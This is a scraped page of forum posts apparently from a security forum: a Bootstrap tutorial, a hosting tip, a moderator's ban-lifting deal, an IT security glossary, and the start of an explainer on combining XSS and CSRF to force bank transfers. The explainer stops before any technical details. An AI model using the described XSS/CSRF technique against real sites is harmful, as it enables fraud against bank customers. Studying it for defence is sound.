All you need to do is reference the CSS file and JS file and you are bootstrapped. So for an example:

    <!DOCTYPE html>
    <html>
    <head>
      <meta charset="utf-8">
      <title>With Bootstrap</title>
      <link rel="stylesheet" href="css/bootstrap.min.css">
    </head>
    <body>
      <p>Hello Bootstrap!</p>
      <script src="//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
      <script src="js/bootstrap.min.js"></script>
    </body>
    </html>

Note: Now remember you don’t have to include any JS files for Bootstrap to function, you’ll get all the responsive features, grid and CSS styles just from the CSS file but for some parts of the framework like alerts, tabs and so on the JS files are needed. Also don’t forget to include jQuery if you’ll be using Bootstrap's JS plugins.

Note 2: I always put all my JS files at the bottom of my HTML because they don’t block page rendering and CSS loading time. This is something I do because I tend to follow the YSlow and Google PageSpeed rules for fast loading websites and page optimization. If you are new to this be sure to check the links above and read about it because this is something you should already be doing.

OK now that we’ve included Bootstrap in our project we can start using all the magic that comes with it.

Bootstrap Basics

With Bootstrap you get a 12 column grid with two options:

- fluid - if you need your app to be 100% wide and use up all the width of the screen you should choose this option
- fixed - if you're creating a standard website you probably won't be needing all 100% of the screen so you choose the 940px option

Note: If you go with a fixed layout remember this: by default Bootstrap has a media query for "large desktops" so if your screen is more than 1200px in resolution the 940px grid becomes 1170px wide. You can turn this off in the customization section I mentioned earlier and just have the 940px grid be the default one. I usually leave it in because things look a lot smaller if you have a 27" iMac.

So let’s say we want to use the fixed layout to create 3 boxes on our homepage and we’d like them to float next to each other. If you were not using Bootstrap you’d have to write some CSS for your content container, each box, add floats, clear floats, padding, margins...ugh just see the magic of Bootstrap:

    <!DOCTYPE html>
    <html>
    <head>
      <meta charset="utf-8">
      <title>Getting started with Bootstrap</title>
      <link rel="stylesheet" href="http://flip.hr/css/bootstrap.min.css">
    </head>
    <body>
      <div class="container">
        <div class="hero-unit">
          <h1>Awesome responsive layout</h1>
          <p>Hello guys i am a ".hero-unit" and you can use me if you wanna say something important.</p>
          <p><a class="btn btn-primary btn-large">Super important »</a></p>
        </div><!-- .hero-unit -->
        <div class="row">
          <div class="span4">
            <h2>Box Number 1</h2>
            <p>Donec id elit non mi porta gravida at eget metus. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui. </p>
            <p><a class="btn" href="#">Click meeee »</a></p>
          </div><!-- .span4 -->
          <div class="span4">
            <h2>Box Number 2</h2>
            <p>Donec id elit non mi porta gravida at eget metus. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui. </p>
            <p><a class="btn" href="#">Click meeee »</a></p>
          </div><!-- .span4 -->
          <div class="span4">
            <h2>Box Number 3</h2>
            <p>Donec id elit non mi porta gravida at eget metus. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui. </p>
            <p><a class="btn" href="#">Click meeee »</a></p>
          </div><!-- .span4 -->
        </div><!-- .row -->
      </div><!-- .container -->
    </body>
    </html>

That’s it! We have 3 boxes with some nice default styling and as a bonus we added some content in front of the boxes to make it more sexy. Best part, everything is responsive, just try to resize your browser. (This is the point where you stare at the screen with a tear in your eye)

Let’s break it down a bit:

- <div class="container"></div> - this one is a must have and it serves as a wrapper for all your page content. The most amazing thing is if you want to use a fluid layout just add container-fluid instead of container and that’s it.
- <div class="row"></div> - another must have for creating rows is a column wrapper that takes care of margins, padding and floating clears. Again if you are using a fluid layout just replace row with row-fluid and you're good to go.
- <div class="span4"></div> - a DIV with class span* is basically a column and in this case we want to have 3 boxes in one row so if we do simple math 12/3=4 and you get span4.
- <div class="hero-unit"></div> - this is just another component of Bootstrap we added to make this sample more cool.

As you can see with only 3 CSS classes you already know the basics. The only thing you will be changing are .span classes and they can go from 1 to 12 depending on how wide you want your box/element to be. So a DIV with a “span12” class would be 1170px wide on large desktops, 940px wide on laptops, and smaller for tablets or phones. For a more complicated example check out the Bootstrap examples.

With only this you can already create your responsive layout in a matter of minutes but it doesn’t stop there, if you dig into Bootstrap docs you’ll see there are UI components like: navbars, tabs, accordions, dropdowns, buttons and so much more. Be sure to check out the Bootstrap Components page for all the greatness.

Another good thing about Bootstrap is that you can use a bunch of standardized and cool JS plugins like modals, tabs, accordions, sliders which work great with the default Bootstrap style but are also responsive and fully customizable.

Extending Bootstrap

Bootstrap by itself comes packed with most of the stuff a regular front-end developer would need, especially a beginner but for those more advanced guys or pros here are a few plugins or hacks that made my life easier:

- jQuery UI Bootstrap Theme - This is something a lot of front-end developers use when building modern and interactive designs so a suitable jQuery UI theme is a must have. I have tested this myself and it really works well and accompanies the Bootstrap design as it should.
- Bootstrap Colorpicker - Another great plugin for Bootstrap to handle color picking in an awesome way.
- Fbootstrapp - Fbootstrapp is a toolkit designed to kickstart development of facebook iframe apps in both relevant sizes. It includes base CSS and HTML for typography, forms, buttons, tables, grids, navigation, and more, styled in the typical facebook look and feel.
- Forms inside Bootstrap Dropdowns - This is more of a hack but it really comes in handy if you wanna have login forms in those simple to use Bootstrap Dropdown menus.
- Font Awesome - If you are more of an icon guy when building UI elements then this custom font that is made of icons is gonna make you smile. Over 70 icons made especially for bootstrap in one CSS file.
- BootBox - Bootbox.js is a small JavaScript library which allows you to create programmatic dialog boxes using Twitter's Bootstrap modals.

Going crazy with Bootstrap

So you're maybe thinking: “This is all cool but Bootstrap has a too generic design and I just don’t see it working with my super custom and awesome designs”. Stop right there and let me tell you that you are wrong. You can use Bootstrap with any design and in any case. I had clients approach me with existing code and CSS but no responsive layout and in a matter of a day or two I managed to turn their website into a responsive one.

A great example is my company's portfolio over at flip.hr. When you visit the site most of you would never even think that this is built on Bootstrap because the design is so customized and different but yet again everything was done on top of Bootstrap. But indeed it is, and I’ll name a few of the components we used: navbars, hero units, thumbnails, buttons, modals, base styles and so much more. We also knew we wanted to have a full screen experience on our website so we used Bootstrap’s fluid layout which saved us a lot of time so we could focus more on the design and UI itself.

Another good thing about Bootstrap is that it’s very flexible and plays nice with almost everything. For an example on our website we included some more stuff like: layout centering, lazy loading of images, hardware acceleration for page transitions, custom modal loaders for Bootstrap, a lot of CSS3 transitions, transforms and effects. We also wrote some media queries of our own because we wanted things to look and feel the same on all devices but most of it still comes from the power of Bootstrap. This kind of a website would take us months to make and test on all devices and resolutions, this way we could focus more on the design, functionality and SEO stuff.

Secrets of the PROs

- Adobe Edge Inspect - Edge Inspect was just recently released and it enables you to preview and test designs on iOS and Android devices, oh and did I mention it does all that remotely? This’ll save you a lot of time and help you produce better and faster responsive features.
- Viewport Resizer - Another great new tool for testing your website's responsiveness. This is a browser based tool (bookmarklet to be exact) so no additional download or set up is required. Just click and go.

So basically there are a few approaches to responsive images that actually work. Most of the guys I know use Filament Group’s responsive images technique but adaptive images is also a good way, just a bit of a different concept. So until the HTML5 spec gets something better and native, read up on these three links:

- Responsive Images
- Adaptive Images
- Retina Images

Misc

So this is also something that might come in useful when working on responsive designs. The Fittext plugin is really cool but hopefully you won't have to use it often and the Responsive Slides plugin is the best one out there.

- Fittext
- Responsive Slides

Bonus and More Resources

- HTML5 Boilerplate - This is a great HTML5 template for all front-end developers. It’s basically a set of tips, hacks and best practices for front-end development. I use this in most of my projects, of course in time you will pick the parts you need but all in all a must have and a must read.
- Foundation framework - This is something I managed to find out during the writing of this article. I have checked this out for a few minutes and it looks to be a possible alternative to Bootstrap. Foundation as they say is the most advanced responsive framework out there and it has a lot of the features that Bootstrap has with some added bonuses. Be sure to check this out also.

Here are some other useful resources related to Twitter Bootstrap.

- Building Twitter Bootstrap
- Twitter Bootstrap 101: Introduction
- 20 Awesome Resources for Twitter Bootstrap Lovers
- 20+ Beautiful Resources That Complement Twitter Bootstrap

Conclusion

I hope I managed to introduce Bootstrap to you in a good way and that you would give it a try. Remember it will not make you a website if you don’t know anything but it will sure as hell help you a lot if you know something.

Source: How to use Twitter Bootstrap to Create a Responsive Website Design
    1 point
  6. No problem, get one from 1and1, they also give you privacy free for 1 year, http://www.retailmenot.com/view/1and1.com?c=5188877 It comes to somewhere around 2-3$
    1 point
  7. We don't override the decisions of the moderators/admins and lift bans without a well-founded reason. So that you have no objections and so that the person who banned you doesn't get upset, I propose something else. I'll lift your bans and you have 5 days for each of you to post 10 good security news items or 5 tutorials (photoshop, windows, linux, php, python ... or anything else technical and of good quality).

You stepped out of line and got banned. I think the other mods/admins also agree that we lift your bans, as long as you do some work for the community.

If you break the agreement, you get a permanent ban from me, and I'll add a "_Labar" suffix to your usernames. Don't try to shortchange me.

Users:
- askwrite
- Cifre
- Byte-ul

Deal ?!

They all agreed. The bans will be lifted in a few minutes. So you have 5 days.

----------------------------
edit - 02.03.2014

Threads made by Byte-ul
https://rstforums.com/forum/82145-boeing-launches-ultra-secure-black-smartphone-has-self-destruct-feature.rst
https://rstforums.com/forum/82147-chameleon-virus-spreads-across-wifi-access-points-like-common-cold.rst
https://rstforums.com/forum/82159-optic-nerve-nsa-hacked-into-webcam-millions-yahoo-users-private-images.rst
https://rstforums.com/forum/82162-dissecting-newest-ie10-0-day-exploit-cve-2014-0322-a.rst
https://rstforums.com/forum/82173-yahoo-vulnerability-allows-hacker-delete-1-5-million-records-database.rst
https://rstforums.com/forum/82200-hackercare-aims-hack-healthcare-startups.rst
https://rstforums.com/forum/82201-auroracoin-airdrop-approaches-iceland-adopts-cryptocurrency.rst
https://rstforums.com/forum/82199-amex-debuts-its-most-mobile-integrated-rewards-focused-credit-card.rst

Threads made by Cifre
https://rstforums.com/forum/82136-fortress-may-first-public-company-own-millions-dollars-bitcoins-disclose.rst
https://rstforums.com/forum/82137-mt-gox-files-bankruptcy-claims-63-6m-debt.rst
https://rstforums.com/forum/82144-how-use-twitter-bootstrap-create-responsive-website-design.rst
https://rstforums.com/forum/82151-how-create-windows-store-app-using-html-javascript.rst
https://rstforums.com/forum/82187-creating-new-google-play-multi-level-navigation-scratch.rst
https://rstforums.com/forum/82188-how-encrypt-custom-configuration-section-asp-net.rst

Threads made by askwrite
https://rstforums.com/forum/82134-photoshop-cum-sa-faci-un-logo-sigla.rst
https://rstforums.com/forum/82138-photoshop-dispersion-effect-smoke-cs7.rst
https://rstforums.com/forum/82139-photoshop-cum-sa-faci-un-banner-web-animat.rst
https://rstforums.com/forum/82140-photoshop-soft-focus-effect.rst
https://rstforums.com/forum/82142-photoshop-glowing-line-effect.rst

askwrite seems to have shortchanged us somewhat on the deal. Cifre and Byte-ul, the guys really did post.

// edit: You can carry on, guys. If you also make a quality post now and then, people will take them into account. That's the idea of a community.
    1 point
  8. Computer security (IT security) - also known as cyber security or IT security, is information security applied to computers and computer networks. The field covers all the processes and mechanisms by which computer-based equipment, information and services are protected from unintended or unauthorized access, from unwanted modification or from destruction. Computer security also includes the protection of IT systems against unforeseen events (e.g. fires) and natural disasters (e.g. floods).

Bit – an extension of the term binary digit. The smallest unit of information in a binary notation system. A binary digit having the value 0 or 1.

Application – a software program hosted by an information system.

Authenticate – an operation used to confirm the identity of an entity when that identity requests access.

Authentication – used when verifying the identity of a user, user device, or other entity. The process of establishing confidence in authenticity. It comprises identity verification, message origin authentication and message content authentication. A process that establishes the origin of information or determines the identity of an entity. The process of verifying the identity or other attributes claimed by or assumed of an entity (user, process, or device), or of verifying the source and integrity of data. The process of establishing confidence in the identity of users or information systems.

Access – the ability to use any resource of an information system (IS).
The ability and means to communicate with or to interact with a system, to use the system's resources in order to handle information, to gain knowledge of the information the system contains, or to control the system's components and functions.

Access control – the process of granting or denying a specific request, such as obtaining and using information and related information processing services.

Access type – the privilege held to perform an action on an object or entity. Examples of access types: read, write, execute, append, modify, delete and create.

Authentication Code – a cryptographic control based on a previously tested security function (also known as a Message Authentication Code [MAC]).

Administrative account – a user account with full privileges (rights) on a computer. (E.g. the root user account on Linux and Unix operating systems, Administrator on Windows operating systems. Also known as superuser.)

Active content – can refer to:
# electronic documents that carry data or trigger actions automatically on a computer platform, without the intervention of a user.
# computer programs in various forms, capable of moving data or triggering actions automatically on a computer platform, without the intervention of a user.

Advanced Persistent Threats (APT) – this refers to an adversary that has a sophisticated level of expertise and significant resources, which allow it to create opportunities to achieve its objectives by using multiple attack vectors (for example cyber, physical, and fraud or deception).
These objectives typically include establishing and extending a foothold in the IT infrastructure of the targeted organizations for the purpose of extracting and filtering information, undermining or impeding critical aspects of an action, program or organization, acting effectively to fulfil these objectives in the future. The advanced persistent threat: (i) pursues its objectives repeatedly, over an extended period of time, (ii) adapts to the defenders' efforts to resist it, and (iii) is determined to maintain the level of interaction needed to execute its objectives.

Anti-spoof – countermeasures taken to prevent the unauthorized use of legitimate identification and authentication (I&A) data, already obtained, with the aim of imitating a subject other than the attacker.

Alert – notification that an attack is in progress or that there has been an attack directed at an organization's information systems.

Attack – an attempt to gain unauthorized access to a system's services, resources or information, or an attempt to compromise the integrity of the system. Any kind of malicious activity that attempts to collect, disrupt, deny, degrade or destroy the resources of an information system or the information itself.

Attack Signature – a specific sequence of events that indicates an unauthorized access attempt. A characteristic byte pattern used in malicious code, or an indicator or set of indicators, that allows malicious activity in a network to be identified.

Active attack – an attack that alters a system or data.

Blended attack – a hostile action undertaken to spread malicious code through multiple methods.

Brute Force Password Attack – a method of accessing a locked device by trying multiple combinations of numeric and/or alphanumeric passwords.
Buffer Overflow – a state of an interface in which more input can be placed into a data buffer or data holding area, overwriting the information previously held. Attackers exploit such a state to crash the system or to insert specially crafted code that allows them to take control of the system.

Buffer Overflow Attack – a method of overloading the predefined amount of space in a buffer, which can overwrite and possibly corrupt data in memory.

Access authority – an entity responsible for monitoring and granting access privileges to other authorized entities.

Advisory – notification of significant new trends or developments regarding the threat to an organization's information systems. This notification may include analytical insights into the trends, intentions, technologies or tactics of an adversary targeting information systems.

Audit – independent analysis and examination of records and activities in order to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend the necessary changes in controls, policies or procedures.

Active security testing – a form of security testing that involves direct interaction with a target, such as sending data packets to it.

Analysis – the examination of acquired data, valuable for its significance and probative value to the incident.

Audit Reduction Tools – preprocessors designed to reduce the volume of audit records in order to facilitate manual review. Before a security review, these tools can remove many audit records known to have little significance from a security point of view.
These tools generally remove the records generated by specified classes of events, such as the records generated by nightly backups.

Audit data – a chronological record of a system's activities that allows the reconstruction and examination of the sequence of events as well as of the changes in an event.

Audit log – a chronological record of system activities. It includes records of system accesses and the operations performed in a given period of time.

Audit review – the assessment of an information system in order to evaluate the adequacy of the implemented security controls, to make sure that they function properly, to identify vulnerabilities and to assist in the implementation of new security controls where necessary. This assessment is carried out annually or whenever a significant change has taken place, and may lead to the recertification of the information system.

Audit trail – a record or a collection of records (data) showing who has accessed an IT system and what operations the user performed in a given period. A chronological record that reconstructs and examines the sequence of activities surrounding or leading to a specific operation, procedure or event in a security-relevant transaction, from the beginning to the final result.

Anomaly-Based Detection – the process of comparing, by definition, the activity considered normal against the observed events in order to identify significant deviations.

Attack Sensing and Warning (AS&W) – the detection, correlation, identification and characterization of intentional unauthorized activity, with notification to decision makers so that the attack can be responded to appropriately.
Access Control List (ACL) –
1. A list of permissions associated with an object. The list specifies who or what is allowed to access the object and what operations are allowed to be performed on the object.
2. A mechanism that implements access control for a system resource by enumerating the system entities that are permitted to access the resource and stating, either implicitly or explicitly, the access modes granted to each entity.

Access Control Lists (ACLs) – a register of:
1. users (including groups, computers, processes) who have been given permission to use a particular system resource, and
2. the types of access they have been permitted.

Access control mechanism – security safeguards (for example hardware and software features, physical controls, operating procedures, management procedures, and various combinations of these) designed to detect and deny unauthorized access and to permit authorized access to an information system.

Access profile – the association of a user with a list of protected objects to which the user may have access.

User Account Management – involves:
1) the process of requesting, establishing, creating and closing the user account;
2) the supervision of users and of their respective access authorizations;
3) the management of these functions.

Add-on security – the incorporation of new hardware or software components, or of protective measures for software, into an operational information system.

Adequate security – security proportional to the risk and to the magnitude of the harm that would result from the loss, misuse or unauthorized access to information, or even from its modification.
This includes the fact that information systems operate effectively and provide appropriate confidentiality, integrity and availability through the use of management that is efficient in terms of costs, personnel, operation and technical controls.
Common Misuse Scoring System (CMSS) – A grid for quantifying the severity of vulnerabilities enabled by the misuse of software. A software vulnerability in the case of misuse is a functional capability provided by the software. A vulnerability enabled by the misuse of software is a vulnerability in which the feature also provides an avenue to compromise the security of a system.
Administrative safeguards – Administrative actions, policies and procedures to manage the selection, development, implementation and maintenance of security measures to protect the integrity of electronic information, and to manage the human conduct of the regulated entity in relation to protecting that information.
Advanced Encryption Standard (AES) – The Advanced Encryption Standard specifies a cryptographic algorithm that can be used to protect electronic data. The AES algorithm is a symmetric block cipher that can encrypt (encipher) and decrypt (decipher) information. The standard uses the Rijndael algorithm, a symmetric block cipher that can process data blocks of 128 bits, using cipher keys with lengths of 128, 192 and 256 bits.
Advanced Key Processor (AKP) – A cryptographic device that performs all cryptographic functions for the management of a client node and contains the interfaces for 1) exchanging information with a client platform, 2) interacting with complementary devices, and 3) connecting a client platform securely to the Primary Services Node.
Asymmetric keys – Two related keys, one public and the other private, used to perform complementary operations such as encryption and decryption, or signature generation and signature verification.
Allocation – The organizational process of determining the defined security measures, which may be specific, hybrid or common. The organizational process of assigning security controls to the specific information system components responsible for providing a particular security capability (for example, router, server, remotely controlled sensors).
Antispyware software – A computer program specialized in detecting both malware and non-malware forms of spyware.
Antivirus software – A program that monitors a computer or a network to identify all major types of malware and to prevent malware content or incidents of this kind from occurring.
Assurance – The grounds for confidence that the other four security goals (integrity, availability, confidentiality and accountability) have been adequately met by a specific implementation. "Adequately met" includes (1) correct functionality, (2) sufficient protection against unintentional errors (by users or by software), and (3) sufficient resistance to intentional penetration or bypass. It also refers to the confidence that the set of security controls intended for an information system is effective in its application. The measure of confidence that the practices, security features, procedures and architecture of an information system accurately mediate and enforce the security policy.
Assured software – A computer application that has been designed, developed, analyzed and tested using processes, tools and techniques that establish a level of confidence in it.
Authentication mechanism – A hardware- or software-based mechanism that forces users to prove their identity before accessing data on a device.
Authentication mode – A block cipher mode of operation that can provide assurance of the authenticity and, therefore, the integrity of data.
Authentication period – The maximum acceptable period between any initial authentication process and the subsequent reauthentication processes during a single terminal session or during the period in which data is being accessed.
Authentication protocol – A defined sequence of messages between a claimant and a verifier that demonstrates that the claimant has possession and control of a valid token to establish his/her identity and, optionally, demonstrates to the claimant that he/she is communicating with the intended verifier. It is a well-specified process in which the exchange of messages between claimant and verifier allows the verifier to confirm the claimant's identity.
Authentication Tag – A pair of bit strings associated with data to provide assurance of its authenticity.
Authentication token – Authentication information transmitted during an authentication data exchange.
Authenticator – The means used to confirm the identity of a user, process or device (for example a user password or token).
Authenticity – The property of being genuine, verifiable and trusted; confidence in the validity of a transmission, a message or a message originator.
Authorization – Access privileges granted to a user, program or process, or the act of granting those privileges.
Automated key transport – The transport of cryptographic keys, usually in encrypted form, using electronic means such as a computer network (for example, key transport/agreement protocols).
Backup – A copy of files and programs made to facilitate recovery when necessary.
Automated password generator – An algorithm that creates random passwords that have no association with a particular user.
Autonomous System (AS) – One or more routers under a single operational administration, with the same routing policy.
Availability – Ensuring timely and reliable access to information and to its use. The property of being accessible and usable on demand by an authorized entity.
Awareness – Activities that seek to focus a person's attention on a security issue or on a set of such issues.
Back door – Typically unauthorized software or a hardware mechanism used covertly to circumvent security controls.
Backdoor – An undocumented way of gaining access to an information system. A backdoor is a potential security risk.
Basic Testing – A test methodology that has no knowledge of the internal structure and implementation details of the assessment object. Also known as black box testing.
Baseline – The hardware, software, databases and relevant documentation for an information system at a given point in time.
Behavioral outcome – What a person is expected to demonstrate after completing IT security training, in order to perform well on the job.
Benign environment – A non-hostile location protected from hostile external elements by physical, personnel and procedural security countermeasures. It refers to the location where the computing systems are physically housed.
Binding – The process of associating two related elements, the common element being information. The process of associating a specific communications terminal with a specific cryptographic key. It can also be an acknowledgement by a trusted third party that associates an entity's identity with its public key.
Biometric trait – A physical or behavioral characteristic of a human being. A measurable physical characteristic or personal behavioral trait used to recognize the identity, or to verify the claimed identity, of an applicant. Facial images, fingerprints, iris scans and recognition of a particular person's handwriting are all examples of biometrics. A particular set of gestures made with one or both hands in front of an access video camera connected to an automated access system can serve as an access code.
Biometric information – Stored electronic information pertaining to a biometric trait. This information can be in the form of raw or compressed pixels or in the form of certain characteristics (e.g. patterns).
Biometric system – An automated system capable of: 1) capturing a biometric sample from an end user; 2) extracting biometric data from that sample; 3) comparing the extracted biometric data with the data contained in one or more references; 4) deciding how well they match; and 5) indicating positively or negatively whether the identification or verification of an identity has succeeded.
Black core – A communications network architecture in which user data traverses a global IP network and is encrypted at the ends at the IP protocol layer.
Blinding – Generating network traffic that is likely to trigger many alerts in a short period of time, in order to mask the alerts triggered by a "real" attack carried out at the same time.
Black list – A list of e-mail senders who have previously sent spam to a user.
A list of discrete entities, such as hosts or applications, that are considered to have previously been associated with malicious activity.
Blacklisting – The process by which a system invalidates a user ID based on the user's previous inappropriate actions. A blacklisted user ID cannot be used to log on to a system, even with the correct authenticator. Adding to a blacklist and removing from a blacklist are both events of great relevance to computer security. Blacklisting also applies to blocks of IP address classes, to prevent inappropriate or unauthorized use of Internet resources.
Blue Team – 1. The group responsible for protecting an institution's use of information systems by maintaining their security against a group of imaginary or even real attackers (e.g. the Red Team). Typically, the Blue Team and its members must defend the systems against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g. as part of an operational exercise), and 3) according to rules established and monitored by a neutral group refereeing the simulation or exercise (e.g. the White Team). 2. The term Blue Team is also used for a group of individuals who conduct vulnerability assessments of an operational network and provide mitigation techniques to customers who need an independent technical review of their network's security posture. The Blue Team identifies security threats and risks in the operating environment and, in cooperation with the customer, analyzes the network and its current state of security.
Based on the Blue Team's findings and expertise, recommendations are provided that integrate into a common overall security solution to improve the cyber security posture of the customer's systems. Very often a Blue Team is engaged before a Red Team, to make sure that the customer's networks are as secure as possible before the Red Team tests the systems.
Boundary – The physical or logical perimeter of a system.
Boundary Protection – Monitoring and control of communications at the external boundary of an information system in order to prevent and detect malicious actions and unauthorized communications, through the use of boundary protection devices (e.g. proxies, gateways, routers, firewalls, guards, encrypted tunnels).
Boundary protection device – A device with appropriate mechanisms that: (I) facilitates the choice of different security policies for interconnected systems (e.g. controls the flow of information into or out of an interconnected system) and/or (II) provides boundary protection to the information system. A device with appropriate mechanisms that facilitates the choice of different security policies for interconnected systems.
Browsing – The act of searching through an information system's storage or active content to locate or acquire information, without necessarily knowing of the existence or the format of the information being sought.
Bulk encryption – The encryption of all channels of a multichannel telecommunications link.
Firewall – A network security software or hardware system that inspects incoming and outgoing network traffic by analyzing data packets and determines whether or not they should be allowed through, based on a predetermined set of rules. A firewall establishes a filtering barrier between a secure, trusted internal network and another network (e.g. the Internet) that is assumed not to be secure or trusted. Many routers contain firewall components and, conversely, many firewalls can perform basic routing functions.
Challenge and Reply Authentication – A prearranged procedure in which a subject makes an authentication request to another subject and proves the validity of the request through a correct reply.
Challenge-Response Protocol – An authentication protocol in which the verifier sends the claimant a challenge (usually a random value) that the claimant combines with a secret used in authentication (often by hashing the challenge and the secret shared by the two entities, or by performing a private-key operation on the challenge) to generate a response that is sent to the verifier. The verifier can independently verify the response generated by the claimant (for example by recomputing the hash of the challenge and the shared secret and comparing it with the response, or by performing a public-key operation on the response) and establish that the claimant possesses and controls the secret.
Check Word – Cipher text generated by a cryptographic function to detect failures (gaps) in cryptography.
Checksum – A value computed over a collection of data in order to detect errors or manipulation intended to alter or falsify it.
Cipher – A series of transformations that converts plaintext into ciphertext using a cipher key. In any cryptographic system, arbitrary symbols or groups of symbols represent units of plaintext, rearranged units of plaintext, or both.
Ciphony – The process of enciphering audio information, resulting in an encrypted (enciphered) audio sequence.
Closed security environment – An environment that provides sufficient assurance that applications and equipment are protected against the introduction of anything harmful during the life cycle of the information system.
Proximal-type security relies on a system made up of developers, operators and maintenance personnel who are sufficiently vetted and who hold the necessary authorization and configuration control.
Cipher (code) – A system of communication in which arbitrary groups of letters, numbers or symbols represent units of plaintext of varying length.
Cloud computing – A model for enabling on-demand access to a pool of configurable IT capabilities/resources (e.g. networks, servers, storage, applications and services) that can be rapidly provisioned and released with minimal management effort or minimal interaction on the part of the provider of such services. Users are allowed access to technology-based services from the "cloud" network without knowledge of, expertise with, or control over the underlying technology infrastructure. This cloud model has five essential characteristics (on-demand self-service, ubiquitous network access, location-independent resource pooling, rapid elasticity and measured service); three service delivery models (Cloud Software as a Service [SaaS], Cloud Platform as a Service [PaaS] and Cloud Infrastructure as a Service [IaaS]); and four "enterprise" access models (Private cloud, Community cloud, Public cloud and Hybrid cloud). Note: User data and essential security services reside in, and can be managed from within, the "cloud" network.
Common Vulnerabilities and Exposures (CVE) – A dictionary of common names for publicly disclosed information about the vulnerabilities of an information system.
Common Vulnerability Scoring System (CVSS) – A Security Content Automation Protocol specification for communicating the characteristics of vulnerabilities and quantifying their severity.
Communications cover – Concealing or altering the characteristics of normal communications patterns in order to hide the transmission of information that could be of value to a potential adversary.
Communications deception – Deliberate transmission, retransmission or alteration of communications with the aim of misleading an intercepting adversary's interpretation.
Comprehensive testing – A test methodology that assumes explicit and substantial knowledge of the internal structure and implementation details of the assessment object. Also known as white box testing.
Computer abuse – Intentional or negligent misuse, alteration, disruption or destruction of the information-processing resources of a computer system.
Computer cryptography – The use of a crypto-algorithm computer program to authenticate or to encrypt/decrypt information.
Computer forensics – The practice of gathering, retaining and analyzing computer-related data for investigative purposes, in a manner that preserves the integrity of the data.
Computer Incident Response Team (CIRT) – An organized group of people, usually made up of security analysts, whose mission is to develop, recommend and coordinate actions for the immediate mitigation of effects and consequences, and for the containment, eradication and recovery that follow computer security incidents. Also called a Computer Security Incident Response Team (CSIRT) or CIRC (Computer Incident Response Center, Computer Incident Response Capability or Cyber Incident Response Team).
Computer Network Attack (CNA) – Actions taken through the use of a computer network in order to disrupt, deny access to, degrade or destroy the information resident in computers and computer networks, or the computers and networks themselves.
Computer Network Defense (CND) – Actions taken to defend a computer network against any unauthorized activity. CND includes monitoring, detection, analysis (such as trend and pattern analysis), and attack response and restoration activities.
Computer Network Exploitation (CNE) – Enabling operations and intelligence collection capabilities conducted through the use of computer networks to gather data from a target, from an adversary's information systems or from its networks.
Computer Network Operations (CNO) – Comprised of CNA, CND and CNE, in an environment favorable to conducting such operations.
Computer Security (COMPUSEC) – Measures and controls that ensure the confidentiality, integrity and availability of the assets of an information system (hardware, software, firmware and the information it contains), including while information is being processed, stored and transmitted.
Computer Security Object (CSO) – A resource, tool or mechanism used to maintain a state of security in a computerized environment. These objects are defined in terms of the attributes they possess, the operations they perform or that are performed on them, and their relationships with other objects.
Computing environment – A workstation or server and its operating system, peripherals and applications.
Configuration control – The process of controlling modifications to hardware, firmware, software and documentation in order to protect the information system against improper modification before, during and after system implementation.
Container – The file used by a virtual disk encryption technology to encompass and protect other files.
Content filtering – The process of monitoring communications such as e-mail and web pages, analyzing them for suspicious content, and preventing the delivery of suspicious content to users.
Continuous monitoring – The process implemented to maintain a current security status for one or more information systems, or for the entire suite of information systems on which the organization's operational mission depends. The process includes: 1) developing a strategy to regularly evaluate the selected IA controls/metrics (IA = identification and authentication), 2) recording and evaluating the relevant IA events and the organization's effectiveness in resolving those events, 3) recording changes to IA controls or changes that affect IA risks, and 4) publishing the current security status to enable information-sharing decisions involving the enterprise.
===========================================================================
Do NOT swear at me, do not criticize me yet! I am not finished! The thread will keep changing, and I will announce when I am done. I do of course welcome pertinent objections by PM, additions on the subject, and suggestions.
===========================================================================
M2G Yes, I completely agree with you! I have not got to them yet, but the terms you told me about could not be left out of it! As I said above, I am nowhere near finished. I started with something less well known. Thanks for mentioning it, it is no bother!
    1 point
  9. What follows attempts to demonstrate the real danger posed by Cross-Site Scripting (XSS) combined with Cross-Site Request Forgery (CSRF). An imaginary bank site was created as an example, and it was shown that a single XSS vulnerability plus a money-transfer operation on the bank's site can turn into a loss of money merely by visiting another site. In the example provided the bank's site is not "over SSL", but SSL would not prevent this attack in any way.
The trap site in our example is entirely controlled by the attacker, but it could in fact be a Flash ad on a trusted site, Facebook / Myspace / LinkedIn applications or other mashups that run untrusted code, or even malicious code running on another trusted site such as a forum or bulletin board.
In the example below, the user visits the bank's site and the attacker's site in two browser tabs at the same time. In fact, the victim is exposed for the entire duration of the session on the server. This means that if a user closes the browser windows without actually logging out of the banking application, they remain vulnerable for a period of time, usually somewhere between 15 and 30 minutes.
http://www.securitycompass.com/videos/xss%20steal.swf
At first the attack may seem exaggerated because of all the factors that have to come into play:
A victim must visit a particular site, one that is vulnerable.
The victim must then visit another site, this time a trap site that knows how to attack the site from step 1, while the victim has a valid session open.
How does this attack become less exaggerated today?
A case study by the Web Application Security Consortium (WASC) shows that almost 60% of sites are vulnerable to XSS.
The ability to discover XSS has never been a simple one, and public disclosure sites such as xssed.com make discovering specific vulnerabilities trivial.
It has been observed that real attacks are carried out through social networking sites and Flash ads. These attack vectors allow malicious users to target thousands of victims concurrently, providing enough potential victims that the chance of at least a few of them having a valid session on a particular vulnerable site becomes higher.
Even though the demo shows an attack on one particular bank, an attacker can try to attack several sites from the same malicious JavaScript. In other words, an XSS fraudster can, at least in theory, try to deliver malware for several different vulnerable sites to thousands of victims in a very short period of time.
What makes this attack particularly devastating is the fact that the victim will not be able to cancel the money transfer. In the bank's transaction logs it will appear that the user intended and consented to transfer the funds. All the transactions originate from the victim's IP address and were sent with the victim's cookies. Only behavioral analysis reveals that the story is in fact a different one (e.g. observing the abnormal speed of the series of requests, or the fact that several payers transferred money to the same person within a short interval of time) and that this is actually fraud.
Technical details of the attack
The user visits http://localhost:3000 (False Secure Bank).
